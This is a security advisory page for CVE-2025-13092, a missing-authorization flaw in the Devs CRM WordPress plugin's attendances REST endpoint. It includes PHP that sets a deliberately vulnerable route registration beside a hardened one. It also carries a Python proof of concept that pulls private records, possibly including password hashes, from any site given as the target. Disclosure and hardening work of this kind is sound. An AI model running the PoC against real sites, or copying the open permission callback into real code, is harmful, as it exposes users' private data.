Security Vulnerability Report
CVE-2025-13092 CVSS 5.3 MEDIUM

CVE-2025-13092

Published: 2025-12-13 16:16:47
Last Modified: 2026-04-15 00:35:42

Description

The Devs CRM – Manage tasks, attendance and teams all together plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the /wp-json/devs-crm/v1/attendances REST API Endpoint in all versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to retrieve private user data, including password hashes.
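The weakness is CWE-862, missing authorization: a REST route registered with a `permission_callback` that accepts every caller. The following is an added illustration of that pattern beside its hardened form; it is not the Devs CRM plugin's own code, and the handler, capability (`list_users`), and table name are assumptions. Only the route path `devs-crm/v1/attendances` and the fact that records included password hashes come from the advisory.

```php
<?php
// Added example (not the plugin's code). Demonstrates CWE-862 on a WordPress
// REST route and the two fixes a reviewer would ask for:
//   1. a real permission_callback (authentication + capability check), and
//   2. an allow-list of output columns so user_pass can never be serialised.

// VULNERABLE PATTERN: '__return_true' hands the route to anonymous callers.
// Kept in its own function so it is not hooked by accident.
function devs_crm_example_register_vulnerable() {
    register_rest_route( 'devs-crm/v1', '/attendances', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'devs_crm_example_list_attendances',
        'permission_callback' => '__return_true', // no capability check at all
    ) );
}

// HARDENED PATTERN: deny anonymous callers, then require a capability.
// 'list_users' is a core capability held by administrators; a real plugin
// would usually register a narrower custom capability instead (assumption).
function devs_crm_example_register_hardened() {
    register_rest_route( 'devs-crm/v1', '/attendances', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'devs_crm_example_list_attendances',
        'permission_callback' => function ( WP_REST_Request $request ) {
            if ( ! is_user_logged_in() ) {
                return new WP_Error( 'rest_not_logged_in', 'Authentication required.', array( 'status' => 401 ) );
            }
            if ( ! current_user_can( 'list_users' ) ) {
                return new WP_Error( 'rest_forbidden', 'Insufficient permissions.', array( 'status' => 403 ) );
            }
            return true;
        },
    ) );
}

// Only the hardened registration is hooked.
add_action( 'rest_api_init', 'devs_crm_example_register_hardened' );

// Handler shared by both registrations. The SELECT names every column it
// returns; user_pass, user_email and activation keys are never selected,
// so a future authorization mistake cannot leak them again.
function devs_crm_example_list_attendances( WP_REST_Request $request ) {
    global $wpdb;
    $table = $wpdb->prefix . 'devs_crm_attendances'; // hypothetical table name
    $limit = max( 1, min( 100, (int) $request->get_param( 'per_page' ) ?: 20 ) );

    $rows = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT a.id, a.user_id, a.check_in, a.check_out, u.display_name
               FROM {$table} a
               JOIN {$wpdb->users} u ON u.ID = a.user_id
              ORDER BY a.id DESC
              LIMIT %d",
            $limit
        ),
        ARRAY_A
    );

    return rest_ensure_response( $rows );
}
```

With the hardened registration in place, an anonymous `GET /wp-json/devs-crm/v1/attendances` receives a 401 `rest_not_logged_in` error instead of the record set, which is exactly the condition the PoC below tests for.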

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Weakness (from the NVD record): CWE-862 Missing Authorization

Configurations (Affected Products)

No configuration data available.

Devs CRM plugin <= 1.1.8 (all versions up to and including 1.1.8)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import json
import sys

import requests
import urllib3

# CVE-2025-13092 PoC - Unauthenticated access to the Devs CRM REST API
# Target: WordPress site with the Devs CRM plugin <= 1.1.8
# The /attendances route lacks a capability check (CWE-862), so an
# anonymous GET returns attendance records containing private user data.

# The request is sent with verify=False; silence the TLS warning it triggers.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def check_vulnerability(target_url):
    """Check whether the target WordPress site is vulnerable to CVE-2025-13092."""
    # Construct the vulnerable REST API endpoint
    endpoint = f"{target_url.rstrip('/')}/wp-json/devs-crm/v1/attendances"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'application/json',
    }

    print(f"[*] Testing endpoint: {endpoint}")
    try:
        # Send an unauthenticated GET request: no cookie, no nonce, no application password
        response = requests.get(endpoint, headers=headers, timeout=10, verify=False)
        print(f"[*] Status Code: {response.status_code}")

        if response.status_code != 200:
            # A patched route typically answers 401 (anonymous) or 403 (logged in,
            # missing capability) with a rest_forbidden error; 404 means the
            # route is not registered at all.
            print("[-] Not vulnerable or endpoint not found")
            return False

        try:
            data = response.json()
        except ValueError:
            print("[-] Endpoint returned 200 but no JSON body; not the REST route")
            return False

        # The route returns a JSON array of records; tolerate a single object too.
        records = data if isinstance(data, list) else [data]
        print(f"[+] VULNERABLE! Retrieved {len(records)} records")
        print(f"[+] Sample data: {json.dumps(records[:2], indent=2)}")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) > 1:
        check_vulnerability(sys.argv[1])
    else:
        print("Usage: python cve-2025-13092.py http://target.com")
```

References

https://wordpress.org/plugins/devs-crm/
https://www.wordfence.com/threat-intel/vulnerabilities/id/c67c520d-4843-4ef1-8c96-cbf0eaab58cb?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13092", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:46.993", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Devs CRM – Manage tasks, attendance and teams all together plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the /wp-json/devs-crm/v1/attendances REST API Endpoint in all versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to retrieve private user data, including password hashes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/devs-crm/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c67c520d-4843-4ef1-8c96-cbf0eaab58cb?source=cve", "source": "[email protected]"}]}}